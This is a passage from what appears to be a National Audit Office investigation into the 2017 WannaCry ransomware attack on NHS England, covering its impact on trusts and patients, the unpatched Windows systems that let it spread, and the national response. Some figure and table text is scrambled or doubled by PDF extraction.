Security Standards (recommended by the National Data Guardian) in the standard NHS
contract for 2017-18 and was providing training to its Board and local teams to raise
awareness of cyber threats. In light of the WannaCry attack, the Department announced
further plans to strengthen NHS organisations
cyber-security.
Our investigation focuses on events immediately before 12 May 2017 and up
until 30 September 2017. We only cover the effect the WannaCry attack had on the
NHS in England. We do not cover how the WannaCry attack affected other countries
or organisations outside the NHS. A cyber attack on either the health or social care
sectors could cause disruption across the whole health and social care sector. For
example, the Care Quality Commission (CQC) told us that, as some trusts were unable
to communicate with social services, there could have been delays in the discharge
of patients from hospital to social care, although the CQC relayed advice from NHS
Digital and NHS England to social care providers to help manage any disruption.
This investigation sets out the facts about:
the ransomware attack
s impact on the NHS and its patients;
why some parts of the NHS were affected; and
how the Department and NHS national bodies responded to the attack.
Investigation: WannaCry cyber attack and the NHS Summary 5
Summary
The WannaCry attack affected NHS services in the week from 12 May to
19 May 2017. The Department of Health (the Department) and NHS England worked with
NHS Digital, NHS Improvement, the National Cyber Security Centre, the National Crime
Agency and others to respond to the attack.
Key findings
The risk of a cyber attack affecting the NHS
WannaCry was the largest cyber attack to affect the NHS, although individual
trusts had been attacked before 12 May 2017. For example, two of the trusts infected
by WannaCry had been infected by previous cyber attacks. One of England
s biggest
trusts, Barts Health NHS Trust, had been infected before, and Northern Lincolnshire and
Goole NHS Foundation Trust had been subject to a ransomware attack in October 2016,
leading to the cancellation of 2,800 appointments (paragraph 3.7 and Figure 5).
The Department was warned about the risks of cyber attacks on the
NHS a year before WannaCry and although it had work under way it did not
formally respond with a written report until July 2017. The Secretary of State for
Health asked the National Data Guardian and the Care Quality Commission (CQC) to
undertake reviews of data security. These reports were published in July 2016 and
warned the Department that cyber attacks could lead to patient information being
lost or compromised and jeopardise access to critical patient record systems. They
recommended that all health and care organisations needed to provide evidence that
they were taking action to improve cyber-security, including moving off old operating
systems. Although the Department and its arm
s-length bodies had work under way to
improve cyber-security in the NHS, the Department did not publish its formal response
to the recommendations until July 2017 (paragraphs 3.6 and 3.11).
6 Summary Investigation: WannaCry cyber attack and the NHS
The Department and its arm
s-length bodies did not know whether local NHS
organisations were prepared for a cyber attack. Local healthcare organisations such
as trusts and clinical commissioning groups are responsible for keeping the information
they hold secure, and for having arrangements in place to respond to an incident or
emergency, including a cyber attack. Local healthcare bodies are overseen by the
Department and its arm
s-length bodies. The Department and Cabinet Office wrote to
trusts in 2014, saying it was essential they had
robust plans
to migrate away from old
software, such as Windows XP, by April 2015. In March and April 2017, NHS Digital had
issued critical alerts warning organisations to patch their systems to prevent WannaCry.
However, before 12 May 2017, the Department had no formal mechanism for assessing
whether NHS organisations had complied with its advice and guidance. Prior to the
attack, NHS Digital had conducted an on-site cyber-security assessment for 88 out of
236 trusts, and none had passed. However, NHS Digital cannot mandate a local body
to take remedial action even if it has concerns about the vulnerability of an organisation
(paragraphs 2.5, 2.7, 2.10 to 2.12 and 3.2, and Figure 4).
How the WannaCry attack affected the NHS
The attack led to disruption in at least 34% of trusts in England although
the Department and NHS England do not know the full extent of the disruption
(Figure 1). On 12 May, NHS England initially identified 45 NHS organisations including
37 trusts that had been infected by the WannaCry ransomware. Over the following days,
more organisations reported they had been affected. In total, at least 81 out of 236
trusts across England were affected. The trusts included:
37 infected and locked out of devices (of which, 27 were acute trusts); and
44 not infected but reporting disruption. For example, these trusts shut down their
email and other systems as a precaution and on their own initiative, as they had not
received central advice early enough on 12 May to inform their decisions on what
to do. This meant, for example, that they had to use pen and paper for activities
usually performed electronically.
NHS England and NHS Digital identified a further 21 trusts that were attempting to
contact the WannaCry domain, but were not locked out of their devices. There are two
possible reasons for this. Trusts may have become infected after the kill-switch had been
activated, and were therefore not locked out of their devices. Alternatively, they may have
contacted the WannaCry domain as part of their cyber-security activity.
A further 603 primary care and other NHS organisations were infected by WannaCry,
including 595 GP practices. However, the Department does not know how many NHS
organisations could not access records or receive information, because they shared
data or systems with an infected trust. NHS Digital told us that it believes no patient data
were compromised or stolen (paragraphs 1.2 to 1.5 and 1.9, and Figure 1).
Trusts not infected
but reporting
disruption
Patient appointments cancelled
GP practices and other
organisations not infected but
reporting disruption
GP practices infected and
locked out of devices
Some of the trusts identified as not infected but reporting disruption did have a small number of devices infected. However, they did not report themselves to NHS England as
infected, and NHS England did not recategorise them as being infected after the WannaCry attack was over.
Some trusts, GP practices and other organisations were identified as having systems that attempted to contact the WannaCry domain, but were not locked out of their devices.
There are two possible explanations for this: they could have become infected after the kill-switch had been activated. Or, they could have avoided infection but contacted the
WannaCry domain as part of their cyber-security activity. NHS England does not know which organisations fall into each category.
Source: National Audit Office analysis of NHS England data
The numbers shown are based on organisations self-reporting problems to national bodies, and NHS England and NHS Digital
s analysis of internet activity, and may be higher
if some organisations did not report the problems they experienced in a timely or accurate way.
Notes
Other organisations
include clinical commissioning groups, commissioning support units, an NHS 111 provider, and non-NHS bodies that provide NHS care, such as a hospice,
social enterprise and community interest companies.
Number of patients diverted from accident and emergency departments at infected trusts to other organisations, includes patients conveyed in an ambulance
Number of trusts or GPs that were delayed in receiving information, such as test results, from infected trusts
GP practices and other organisations
where systems were attempting to
contact WannaCry domain, but not
locked out of devices
Other organisations infected and
locked out of devices
Primary care and other NHS organisations
Number of NHS organisations unable to access records because they shared data or systems with an infected trust
Unknown disruption
Trusts where systems
were attempting to contact
WannaCry domain, but not
locked out of devices
Hospital care
Patient appointments cancelled Estimated 19,494
Including cancelled patient operations
(Including 27 acute trusts)
Trusts infected and
locked out of devices
Known disruption
The NHS experienced a wide range of disruption as a consequence of the WannaCry cyber attack
Figure 1
The impact of WannaCry on the NHS
Figure 1 shows that the NHS experienced a wide range of disruption as a consequence of the WannaCry cyber attack
Investigation: WannaCry cyber attack and the NHS Summary 7
8 Summary Investigation: WannaCry cyber attack and the NHS
Thousands of appointments and operations were cancelled and in five
areas patients had to travel further to accident and emergency departments.
Between 12 May and 18 May, NHS England collected some information on cancelled
appointments, to help it manage the incident, but this did not include all types of
appointment. NHS England identified 6,912 appointments had been cancelled, and
estimated more than 19,000 appointments would have been cancelled in total, based
on the normal rate of follow
up appointments to first appointments. NHS England told
us it does not plan to identify the actual number because it is focusing its efforts on
responding appropriately to the lessons learned from WannaCry. As data were not
collected during the incident, neither the Department nor NHS England know how many
GP appointments were cancelled, or how many ambulances and patients were diverted
from the five accident and emergency departments that were unable to treat some
patients (paragraphs 1.7, 1.8 and 1.10, and Figure 1).
The Department, NHS England and the National Crime Agency told us that
no NHS organisation paid the ransom, but the Department does not know how
much the disruption to services cost the NHS. The Department, NHS England and
the National Crime Agency told us no NHS organisation paid the ransom. NHS Digital
told us it advised the trusts it spoke to not to pay the ransom, and wrote to all trusts on
14 May advising against the payment of ransoms. The Department does not know the
cost of the disruption to services. Costs include: cancelled appointments; additional IT
support provided by local NHS bodies, or IT consultants; or the cost of restoring data and
systems affected by the attack. National and local NHS staff worked overtime including
over the weekend of 13-14 May to resolve problems and to prevent a fresh wave of
organisations being affected by WannaCry on Monday 15 May (paragraphs 1.11 and 1.12).
The cyber attack could have caused more disruption if it had not been
stopped by a cyber researcher activating a
kill-switch
. On the evening of 12 May
a cyber-security researcher activated a
kill-switch
so that WannaCry stopped locking
devices. This meant that some NHS organisations had been infected by the WannaCry
ransomware, but because of the researcher
s actions, they were not locked out of
their devices and systems. Between 15 May and mid-September NHS Digital and
NHS England identified a further 92 organisations, including 21 trusts, as contacting
the WannaCry domain, although some of these may have been contacting the
domain as part of their cyber-security activity. Of the 37 trusts infected and locked
out of devices, 32 were located in the North NHS region and the Midlands and East
NHS region. NHS England believes more organisations were infected in these regions
because they were hit early on 12 May before the WannaCry
kill-switch
was activated
(paragraphs 1.14 and 2.2, and Figure 3).
Investigation: WannaCry cyber attack and the NHS Summary 9
The NHS response to the attack
The Department had developed a plan, which included roles and
responsibilities of national and local organisations for responding to an attack,
but had not tested the plan at a local level. This meant the NHS was not clear what
actions it should take when affected by WannaCry. NHS England found that responding
to WannaCry was different from dealing with other incidents, such as a major transport
accident. Because WannaCry was different it took more time to determine the cause
of the problem, the scale of the problem and the number of organisations and people
affected (paragraph 3.3 and Figure 2).
10 As the NHS had not rehearsed for a national cyber attack it was not
immediately clear who should lead the response and there were problems with
communications. The WannaCry attack began on the morning of 12 May. At 4 pm
NHS England declared the cyber attack a major incident and at 6:45 pm initiated
its existing Emergency, Preparedness, Resilience and Response plans to act as the
single point of coordination for incident management, with support from NHS Digital
and NHS Improvement. In the absence of clear guidelines on responding to a national
cyber attack, local organisations reported the attack to different organisations within
and outside the health sector, including local police. Communication was difficult in
the early stages of the attack as many local organisations could not communicate with
national NHS bodies by email as they had been infected by WannaCry or had shut down
their email systems as a precaution, although NHS Improvement did communicate
with trusts
chief executive officers by telephone. Locally, NHS staff shared information
through personal mobile devices, including using the encrypted WhatsApp application.
Although not an official communication channel, national bodies and trusts told us it
worked well during this incident (paragraphs 3.3 to 3.5 and Figure 2).
11 In line with its existing procedures for managing a major incident, NHS
England initially focused on maintaining emergency care. Since the attack occurred
on a Friday this caused minimal disruption to primary care services, which tend to
be closed over the weekend. Twenty-two of the 27 infected acute trusts managed to
continue treating urgent and emergency patients throughout the weekend. However,
five
in London, Essex, Hertfordshire, Hampshire and Cumbria
had to divert patients
to other accident and emergency departments, and a further two needed outside help
to continue treating patients. By 16 May only two hospitals were still diverting patients.
The recovery was helped by the work of the cyber-security researcher that stopped
WannaCry spreading (paragraphs 1.7, 1.13 and 1.14).
10 Summary Investigation: WannaCry cyber attack and the NHS
Lessons learned
12 NHS Digital told us that all organisations infected by WannaCry shared
the same vulnerability and could have taken relatively simple action to protect
themselves. All NHS organisations infected by WannaCry had unpatched or
unsupported Windows operating systems so were susceptible to the ransomware.
However, whether organisations had patched their systems or not, taking action
to manage their firewalls facing the internet would have guarded organisations
against infection. NHS Digital told us that the majority of NHS devices infected were
unpatched but on supported Microsoft Windows 7 operating systems. Unsupported
devices (those on XP) were in the minority of identified issues. NHS Digital has also
confirmed that the ransomware spread via the internet, including through the N3
network (the broadband network connecting all NHS sites in England), but that there
were no instances of the ransomware spreading via NHSmail (the NHS email system)
(paragraphs 1.2, 1.6 and 2.4 to 2.6).
13 There was no clear relationship between vulnerability to the WannaCry
attack and leadership in trusts. We found no clear relationship between trusts
infected by WannaCry and the quality of their leadership, as rated by the Care Quality
Commission (paragraph 2.8).
14 The NHS has accepted that there are lessons to learn from WannaCry and
is taking action. Lessons identified by the Department and NHS national bodies
include the need to:
develop a response plan setting out what the NHS should do in the event of a
cyber attack and establish the roles and responsibilities of local and national
NHS bodies and the Department;
ensure organisations implement critical CareCERT alerts (emails sent by
NHS Digital providing information or requiring action), including applying
software patches and keeping anti-virus software up to date;
ensure essential communications are getting through during an attack
when systems are down; and
ensure that organisations, boards and their staff are taking the cyber threat
seriously, understand the direct risks to front-line services and are working
proactively to maximise their resilience and minimise impacts on patient care.
Since WannaCry, NHS England and NHS Improvement have written to every trust,
clinical commissioning group and commissioning support unit asking boards to
ensure that they have implemented all 39 CareCERT alerts issued by NHS Digital
between March and May 2017 and taken essential action to secure local firewalls
(paragraphs 3.8 and 3.9).
Investigation: WannaCry cyber attack and the NHS Part One 11
Part One
The impact of the cyber attack
1.1 WannaCry was the largest ever cyber attack to affect the NHS in England.
The timeline of the main events relating to the WannaCry ransomware attack which affected
NHS services in the week from 12 May to 19 May 2017 is set out in Figure 2 overleaf.
The scale of the attack
1.2 NHS Digital told us that the ransomware spread via the internet, including through
the N3 network. As shown in Figure 1 (page 7), the WannaCry ransomware attack
affected at least 81 out of 236 trusts across England. These numbers are based on
NHS organisations
own reports to NHS England. Of these 81 trusts, there were:
37 trusts infected and locked out of devices (of which, 27 were acute trusts); and
44 trusts not infected but reporting disruption.
NHS England and NHS Digital identified a further 21 trusts that were attempting to
contact the WannaCry domain, but were not locked out of their devices. There are two
possible reasons for this. Trusts may have become infected after the kill-switch had been
activated, and were therefore not locked out of their devices.1 Alternatively, they may
have contacted the WannaCry domain as part of their cyber-security activity.
1.3 The trusts infected by the WannaCry ransomware experienced two main types of
disruption including:
NHS staff being locked out of devices, which prevented or delayed staff accessing
and updating patient information, sending test results to patients
GPs and
transferring or discharging patients from hospital; and
medical equipment and devices being locked, or isolated from trusts
IT systems to
prevent them being locked. This meant trusts
radiology and pathology departments
were disrupted as the trusts relied on the equipment and devices for diagnostic
imaging (such as MRI scanners) and for testing blood and tissue samples.
kill-switch
is a mechanism that is incorporated into software to shut down that software, or the device on which it
sits, in an emergency situation in which it cannot be shut down in the usual manner.
Monday 15 May
Tuesday 16 May
Only two trusts
diverting patients away from A&E
Source: National Audit Office
Initially unclear as to who was taking the lead. The
Department of Health leads on cyber issues, but
once it was clear it was a major operational incident
NHS England took the lead
Social media was also reporting the cyber attack
Front-line staff in organisations were calling up either
NHS England or NHS Digital as well as the police
Friday 12 May
Friday 19 May
5:30pm Friday 19 May
Incident
is stood down by NHS England
There was no formal mechanism for assessing whether NHS
organisations had complied with NHS Digital
s instructions, so
one was put in place. This involved NHS England
s Emergency
Preparedness, Resilience and Response team requiring providers
to confirm action had been taken on a number of items
Five trusts were unable to provide emergency care, so arranged to
divert patients to other locations
595 GP practices and 45 other NHS organisations infected,
including 27 acute trusts
NHS England
worked with
IT suppliers of
GP practices
(commissioning
support units or
private sector
support) to
patch
IT systems
Ensuring trusts
and primary care
organisations had
up-to-date antivirus
software installed on
their systems
Monday 15 May
Friday 19 May
Third phase of NHS England
s response: Remedial phase
Saturday 13 May
Monday 15 May
Second phase of NHS England
s response: Ensure that primary care services were stable
Friday 12 May
Sunday 14 May
First phase of NHS England
s response: Focus on securing emergency care pathways
Friday 12 May - Global ransomware attack
By the evening of Sunday 14 May
3,486 GP
practices (44%) had applied necessary patches
Evening
Cyber expert discovers
kill-switch
and stops malware spreading further
6:45 pm
Decision that NHS England would lead the response, co-ordinating with key partners, particularly NHS Digital
4:00 pm
NHS England declares the cyber attack a national major incident
1:06 pm
First notification to NHS England
s Emergency Preparedness, Resilience and Response team of the attack
Late morning
First trusts begin to report problems
Friday 12 May
NHS England emergency response to WannaCry lasted one week
Figure 2
Timeline of the WannaCry attack from 12 May to 19 May 2017
Figure 2 shows The Department has major projects covering most of its priority areas
12 Part One Investigation: WannaCry cyber attack and the NHS
Investigation: WannaCry cyber attack and the NHS Part One 13
As at 19 May 2017, NHS England had identified 1,220 pieces of diagnostic equipment
that had been infected, 1% of all such NHS equipment. Although a relatively small
proportion of devices, the figure does not include devices disconnected from IT systems
to prevent infection. The trusts we spoke to told us about the disruption they had
experienced due to diagnostic equipment being infected or isolated, such as not being
able to send MRI scan results to clinicians treating patients in other parts of the hospital.
1.4 The disruption at trusts not infected by the ransomware was caused by:
the absence of timely central direction, leading to the trusts taking actions on their
own initiative to avoid becoming infected, including shutting down devices or isolating
devices from their networks to protect themselves from the ransomware; or
trusts not being able to access electronic patient records or receive information,
such as test results, because they shared data or systems with an infected trust
which had shut down its systems; or
trusts disconnecting from the N3 network, the broadband network connecting all
NHS sites in England.
1.5 The disruption at these trusts took a number of forms. For example, some trusts
had to use manual workarounds to perform their usual tasks, such as providing
medication to patients, and record information using pen and paper. In addition,
organisations could not receive external emails, so communication with national bodies
and others outside their trust was severely limited.
1.6 Despite widespread local disruption, NHS Digital told us that national NHS IT
systems managed by NHS Digital were not infected, such as the NHS Spine (a service
holding secure databases of demographic and clinical information) and NHSmail
(the NHS email system).
1.7 Of the 27 acute trusts infected and locked out of devices, five had to divert
emergency ambulance services to other hospitals. The five trusts and hospitals were:
Barts Health NHS Trust (Royal London Hospital);
Mid Essex Hospital Services NHS Trust (Broomfield Hospital);
East and North Hertfordshire NHS Trust (Lister Hospital);
Hampshire Hospitals NHS Foundation Trust (Basingstoke Hospital); and
North Cumbria University Hospitals NHS Trust (West Cumberland Hospital).
14 Part One Investigation: WannaCry cyber attack and the NHS
The impact on patients
1.8 As infected NHS organisations could not access important information and
electronic systems, including patient records, they had to cancel appointments and
operations and some trusts had to divert patients to other accident and emergency
departments. Between 12 May and 18 May, NHS England collected some information
on how many appointments had been cancelled to help it manage the incident, but
did not collect data on all types of appointment. NHS England identified that the NHS
had cancelled 6,912 appointments, but this figure does not include repeat outpatient
appointments and cancellations identified after 18 May. NHS England estimated the total
number of cancelled appointments as being around 19,494, based on the normal rate
of follow-up appointments to first appointments, but told us it does not plan to identify
the actual number because it is focusing its efforts on responding appropriately to the
lessons learned from WannaCry. NHS England did not collect data on how many GP
appointments were cancelled or how many ambulances and patients were diverted from
the accident and emergency departments that were unable to treat patients.
1.9 NHS organisations did not report any cases of harm to patients or of data being
compromised or stolen. If the WannaCry ransomware attack had led to any patient harm
or loss of data then NHS England told us that it would expect trusts to report cases
through existing reporting channels, such as reporting data loss direct to the Information
Commissioner
s Office (ICO) in line with existing policy and guidance on information
governance. NHS Digital also told us that analysis of the WannaCry ransomware
suggested that the cyber attack was not aimed at accessing or stealing data, although
it does not know for certain that this is the case.
1.10 The NHS continued to provide emergency care from 12 May to 19 May, although
some patients had to travel further as five hospitals had diverted services (paragraph 1.7).
Patients with planned appointments experienced most disruption. Cancer charities,
including Macmillan Cancer Support and Cancer Research UK, reported cancellations
causing distress to patients. NHS England
s own review identified at least 139 patients
who had an urgent referral for potential cancer cancelled, as at 18 May, although the
actual number may be higher if trusts misreported during the data collection or identified
cancellations after 18 May.
The financial impact
1.11 The Department of Health (the Department), NHS England and the National Crime
Agency have told us that no NHS organisations paid the ransom. NHS Digital told us it
advised against the payment of the WannaCry ransom during site visits and telephone
conferences with infected trusts. Furthermore, NHS England and NHS Digital wrote to
all trusts on 14 May advising them against the payment of ransoms, but these emails
did not always reach trusts after that attack had begun.
Investigation: WannaCry cyber attack and the NHS Part One 15
1.12 The NHS has not calculated the total cost of cancelled appointments; of NHS staff
overtime; of additional IT support provided by NHS local bodies or IT consultants; or the
cost of restoring data and systems affected by the attack. For example, trusts and other
NHS organisations had to roll back systems and restore data and systems, including
re-entering data recorded manually while trusts
systems were down. National and local
NHS staff had to work overtime, including over the weekend of 13
14 May, to resolve
problems and to prevent a fresh wave of organisations being affected by WannaCry
on Monday 15 May.
The recovery
1.13 In line with its established procedures for responding to a major incident, NHS
England focused its initial response on maintaining emergency care, and within 24 hours
began attending to primary care. Since the attack occurred on a Friday it caused
minimal disruption to primary care services, which tend to be closed over the weekend.
Twenty-two of the 27 infected acute trusts continued treating urgent and emergency
patients throughout the weekend. However, five trusts, including Barts Health NHS
Trust, were unable to see some patients and had to divert them to other hospitals, and
a further two needed outside help to continue treating patients. NHS England worked
with trusts to ensure diverts were put in place and help provided. By Tuesday 16 May,
only two hospitals were still diverting patients: Lister Hospital in Hertfordshire and
Broomfield Hospital in Essex. NHS England
stood down
the incident on Friday 19 May.
1.14 The recovery was aided by the work of a cyber-security researcher who activated
a kill-switch so that WannaCry stopped locking devices. The researcher triggered the
kill-switch on the evening of Friday 12 May. This meant that some NHS organisations
were infected by the WannaCry malware, but because of the actions of the researcher
they were not locked out of their devices and systems. Between 15 May and
September, NHS Digital and NHS England identified a further 92 organisations,
including 21 trusts, attempting to contact the WannaCry domain, in addition to the initial
45 organisations they had identified as being infected. Although some of these trusts
may have contacted the WannaCry domain as part of their cyber-security activity.
16 Part Two Investigation: WannaCry cyber attack and the NHS
Part Two
Why some parts of the NHS were affected
2.1 NHS organisations across England were affected by the WannaCry attack.
Figure 3 sets out the location of the trusts affected and shows the:
37 trusts infected by the WannaCry malware; and
44 trusts not infected by the malware but reporting disruption.
2.2 Of the 37 trusts infected, 32 were located in the North NHS region and the
Midlands and East NHS region. NHS England believes more organisations were infected
in these regions because they were hit early on 12 May before the WannaCry kill-switch
was activated.
Failure to patch and update systems and reliance on old software
2.3 It is not possible to eliminate all cyber threats but organisations can prevent harm
through good cyber-security. Such practice includes maintaining up-to-date firewalls and
anti-virus software, and applying patches (updates) in a timely manner. NHS England
view is that WannaCry infected some parts of the NHS mainly because organisations
had failed to maintain good cyber-security practices.
2.4 NHS Digital told us that all the infected trusts had a common vulnerability in their
Windows operating systems which was exploited by the WannaCry attack. All NHS
organisations infected by WannaCry had unpatched, or unsupported, Windows
operating systems. However, whether organisations had patched their systems or
not, taking action to manage their firewalls facing the internet would have guarded
the organisations against infection.
Investigation: WannaCry cyber attack and the NHS Part Two 17
Figure3showsDisruptiontofront-lineservicesaffectedallpartsofthecountrybutwasconcentratedintheNorthNHSregionandtheMidlandsandEastNHSregion
Figure 3
Trusts affected by the cyber attack
Disruption to front-line services affected all parts of the country but was concentrated
in the North NHS region and the Midlands and East NHS region
Acute trust infected
Other trust infected
Acute trust affected, but not infected
Other trust affected, but not infected
Note
1 NHS England believes the concentration of infected trusts in the North NHS region and the Midlands and East NHS
region does not reflect variations in cyber-security, but may be partially explained by these organisations becoming
infected earlier in the day, before the WannaCry
kill-switch
was activated.
Source: National Audit Office analysis of NHS England data
18 Part Two Investigation: WannaCry cyber attack and the NHS
2.5 NHS Digital told us that the majority of NHS devices infected were unpatched but
on the supported Windows 7 operating system. Trusts using Windows 7 could have
protected themselves against WannaCry by applying a patch (or update) issued by
Microsoft in March 2017, and NHS Digital had issued CareCERT alerts on 17 March and
28 April asking trusts to apply the patch.2 According to the Department of Health (the
Department), more than 90% of devices in the NHS use the Windows 7 operating system.
2.6 A second issue was that some trusts were running the older Windows XP
operating system on some devices. This made the trusts vulnerable because Microsoft
was no longer releasing patches for this operating system, and so they could not
protect their systems from WannaCry unless they isolated those devices from the
network. Some trusts also experienced issues with some medical equipment, such
as MRI scanners that have Windows XP embedded within them (see paragraph 1.3).
This equipment is generally managed by the system vendors and local trusts are not
capable of applying updates themselves. Support from the vendors of these devices
was often poor according to NHS England and NHS Digital. However, trusts running
Windows XP on their medical equipment could have protected themselves by isolating
these devices from the rest of the network (although this may necessitate manual
workarounds). In July 2017, as part of its response to the National Data Guardian review,
the Department told local bodies to ensure that they had moved away from, or were
actively managing, unsupported software by April 2018.
2.7 The Department and Cabinet Office had written to trusts in 2014 offering some
temporary help with security for old equipment until April 2015, after which time there
would be no support. This meant that it was essential that all NHS organisations had
robust plans
to migrate away from Windows XP. Despite this, the Department told
us about 5% of the NHS IT estate, including computers and medical equipment, was
still using Windows XP on 12 May 2017. This is partly explained by the fact that it is not
always possible to remove or update Windows XP in applications and IT services based
on that operating system. Immediately after the WannaCry attack Microsoft issued a
patch for Windows XP that would prevent WannaCry and similar ransomware.
Leadership and size of trusts
2.8 We found no clear relationship between those trusts infected by WannaCry and
the quality of their leadership, as rated by the Care Quality Commission (CQC). Of the
37 trusts infected by WannaCry, four (11%) had been rated as
inadequate
against the
well-led
domain at their last CQC inspection, compared with 7% of NHS organisations
not infected.3 However, CQC had not focused on how well led trusts were in relation to
cyber-security in their inspections before 12 May 2017. We understand CQC has plans
to enhance its line of questions regarding information and digital systems as part of
its inspection of the leadership of trusts in the future.
A CareCERT alert is an email sent by NHS Digital providing information or requiring action from NHS organisations.
Of the 37 trusts infected by WannaCry, 36 had a CQC rating.
Investigation: WannaCry cyber attack and the NHS Part Two 19
2.9 We also found that infected trusts tended to employ more staff than average.
Of the 37 infected trusts:
14 (38%) were among the 25% of trusts employing the most staff; and
26 (70%) employed more than the median number of staff.
Although there is limited evidence on why this should be the case, we found that:
some of the trusts we spoke to told us that integrating IT systems when trusts
merge (and become larger) and running many different versions of Windows
operating systems, not all of which are supported, can be a challenge; and
WannaCry exploited weaknesses within parts of Microsoft
s Windows operating
system used to share files within organisations. This meant it spread automatically
in some cases, and organisations with large Windows networks were among the
worst affected.
Prepared for a cyber attack
2.10 Before 12 May, the Department and its arm
s-length bodies did not know whether
trusts had complied with CareCERT alerts as no formal mechanism of assessment
existed at that time. On 12 May, NHS Digital worked with NHS England to put in place
a formal mechanism for assessing whether NHS organisations had complied with
CareCERT alerts. Emergency, Preparedness, Resilience and Response (EPRR) teams
requested a positive return from providers by midnight on 12 May that, for example
where they had:
not been subject to an attack, they had implemented the patch; and
been subject to an attack, they had implemented remedial works; had been
able to roll back their systems; and could continue to provide emergency
services or
if not
had put mitigations in place.
2.11 Before the WannaCry attack, NHS Digital offered an on-site inspection to hospitals
to assess their cyber-security (known as
CareCERT Assure
). This inspection was
voluntary. By 12 May, NHS Digital had inspected 88 out of 236 trusts and none had
passed. NHS Digital
s review of the WannaCry attack concluded that CareCERT
advice and guidance (including inspections) was mostly followed by organisations with
relatively mature cyber
security arrangements, while vulnerable trusts were not taking
action to improve their security. NHS Digital also found that, in general, trusts had
not identified cyber-security as being a risk to patient outcomes, and had tended to
overestimate their readiness to manage a cyber attack. NHS Digital believes this reflects
a lack of understanding of the nature of cyber risk among trusts, rather than a neglect
of cyber
security.
20 Part Two Investigation: WannaCry cyber attack and the NHS
2.12 The Department and its arm
s-length bodies did not hold information on how
prepared local organisations were to respond to a cyber attack, such as whether
cyber-security appeared on organisations
risk registers or whether trusts complied with
good practice. The Department and its arm
s-length bodies also had limited central
information on trusts
IT and digital assets such as anti-virus software and IP addresses.
At the start of its investigation, the National Crime Agency had to gather evidence from
all sites, including information on the devices affected, IP addresses and network traffic,
to assess the impact of WannaCry on the NHS, rather than being able to access the
information centrally.
Investigation: WannaCry cyber attack and the NHS Part Three 21
Part Three
How the Department and the NHS responded
Devolved responsibility for cyber-security
3.1 The Department of Health (the Department) has overall national responsibility for
cyber-security resilience and responding to incidents in the health sector. However, the
Department devolves responsibility for managing cyber-security to local organisations
NHS trusts, GPs, clinical commissioning groups and social care providers. Regulators
and other national bodies oversee and support local NHS organisations. While NHS
foundation trusts are directly accountable to Parliament for delivering healthcare services,
they are held to account by the same regulators as NHS trusts. Roles and responsibilities
for cyber-security as at September 2017 are set out in Figure 4 on pages 22 and 23.
In particular:
NHS Improvement holds trusts and NHS foundation trusts to account for
delivering value for money; and
the Care Quality Commission (CQC) regulates health and social care providers
for safety and quality of their services.
3.2 Both bodies can mandate local NHS organisations to improve their performance.
They also have a role in ensuring that local bodies have appropriate cyber-security
arrangements, but neither are primarily concerned with cyber or information technology
issues. NHS Digital provides guidance, alerts and support to local organisations on
cyber-security, and can visit organisations to evaluate cyber-security arrangements if
asked to do so, as part of CareCERT Assure.4 However, NHS Digital cannot mandate
a local body to take remedial action even if it has concerns about the vulnerability of
that organisation.
Prior to the WannaCry attack, NHS Digital offered an on-site inspection to hospitals to assess their cyber-security.
This was known as
CareCERT Assure
and was voluntary. NHS national bodies are currently revising this system.
22 Part Three Investigation: WannaCry cyber attack and the NHS
Figure
Figure 44
Roles
Roles and
and responsibilities
responsibilities for
for cyber-security
cyber-security in
in the
the NHS
NHS as
as at
at September
September 2017
2017
National
National and
and local
local bodies
bodies share
share responsibility
responsibility for
for cyber-security
cyber-security in
in the
the health
health sector
sector
Cabinet
CabinetOffice
Officeleads
leadson
(non-mandatory)
(non-mandatory)policies
policies
andprinciples,
principles,although
althoughall
departments
departmentsand
andbodies
bodiesare
accountable
accountableand
andresponsible
responsible
fortheir
theirown
owncyber-security
cyber-security
Cabinet
CabinetOffice
Office
GCHQ
GCHQ
National
NationalCyber
Cyber
Security
SecurityCentre
Centre
National
NationalCrime
Crime
Agency
Agency
Home
HomeOffice
Office
Keyguidance
guidanceisispublished
publishedby
theNational
NationalCyber
CyberSecurity
Security
Centre,
Centre,and
andititisissupported
supported
bythe
theNational
NationalCrime
CrimeAgency
Agency
ininleading
leadingthe
theresponse
response
tomajor
majorcyber-security
cyber-security
incidents
incidentsininthe
theUK,
UK,including
including
criminal
criminalinvestigations
investigations
Department
Departmentof
ofHealth
Health
Lead
Leadgovernment
governmentDepartment
Departmentand
andleads
leadsthe
thehealth
healthand
andcare
caresystem,
system,including
includingoverseeing
overseeingcyber-security
cyber-securityresilience
resilienceand
andincident
incidentresponses
responses
Manages
Managesthe
theinterface
interfacebetween
betweenhealth
healthand
andsocial
socialcare
carewith
withthe
theCabinet
CabinetOffice,
Office,other
othergovernment
governmentdepartments
departmentsand
andagencies
agencies
During
Duringaacyber
cyberincident
incidentcoordinates
coordinatesbriefings
briefingsto
toministers
ministersand
andthe
theNational
NationalData
DataGuardian
Guardian
Coordinates
Coordinatesinvolvement
involvementinincentral
centralgovernment
governmentresponses
responsesto
toincidents
incidents
Contributes
Contributesto
tocross-government
cross-governmentbriefings
briefingswhen
whenresponding
respondingto
toaamajor
majorincident,
incident,including
includingwhen
whenaaCOBRA
COBRAresponse
responseisiscalled
called
Coordinates
Coordinatespublic
publiccommunications
communicationsininagreement
agreementwith
withother
otherorganisations
organisations
National
NationalInformation
InformationBoard
Board
NHSEngland
England
NHSDigital
Digital
Provides
Providesleadership
leadershipacross
across
thehealth
healthand
andcare
caresector
sectoron
IT,including
includingsetting
settingannual
annual
commissioning
commissioningpriorities
prioritiesfor
NHSDigital
Digitaland
andturning
turningthese
these
into
intoan
anagreed
agreeddelivery
deliveryplan
plan
Provides
Providesinformation
informationabout
aboutcyber-security
cyber-securityto
tocommissioners
commissioners
Works
Workswith
withlocal
localhealthcare
healthcareto
understand
understandand
andadvise
adviseon
ontheir
their
cyber-security
cyber-securityrequirements
requirements
Works
Workswith
withclinical
clinicalcommissioning
commissioninggroups
groups(CCGs),
(CCGs),
commissioning
commissioningsupport
supportunits
unitsand
andaudit
auditchairs
chairsat
ataaleadership
leadership
level
levelto
tosupport
supportboard
boardownership
ownershipof
ofcyber-security
cyber-securityand
andoverall
overall
response
responsewhen
whencyber
cyberincidents
incidentsoccur
occur
Responsible
Responsiblefor
forhelping
helpingto
toembed
embedcyber-security
cyber-securitystandards
standards
ininthe
thehealth
healthsector,
sector,eg
egthrough
throughthe
theNHS
NHSStandard
StandardContract
Contract
andthrough
throughthe
theinclusion
inclusionof
ofrequirements
requirementsfor
forservices
servicesitit
commissions,
commissions,such
suchas
asIT
ITfor
